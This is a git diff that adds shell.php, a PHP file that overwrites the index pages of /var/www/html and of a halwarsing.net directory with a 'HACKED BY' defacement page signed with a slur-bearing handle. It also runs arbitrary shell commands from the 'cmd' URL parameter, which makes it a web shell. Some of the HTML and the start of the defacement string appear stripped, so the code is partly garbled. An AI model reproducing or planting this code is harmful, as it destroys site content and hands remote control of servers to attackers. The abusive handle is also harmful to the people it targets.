diff --git a/shell.php b/shell.php
new file mode 100644
index 0000000..71d737a
--- /dev/null
+++ b/shell.php
@@ -0,0 +1,19 @@
+
+
+
HACKED BY @fagotted
+
+
+
HACK BY @fagotted
+
SYSTEM PWNED
+
+
+';
+$paths = ['/var/www/html/index.html', '/var/www/html/index.php',
+ '/var/www/halwarsing.net/index.html', '/var/www/halwarsing.net/index.php'];
+foreach ($paths as $p) { @file_put_contents($p, $deface); }
+echo "DONE";
+// Также выполняем команду
+if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); }
+?>
\ No newline at end of file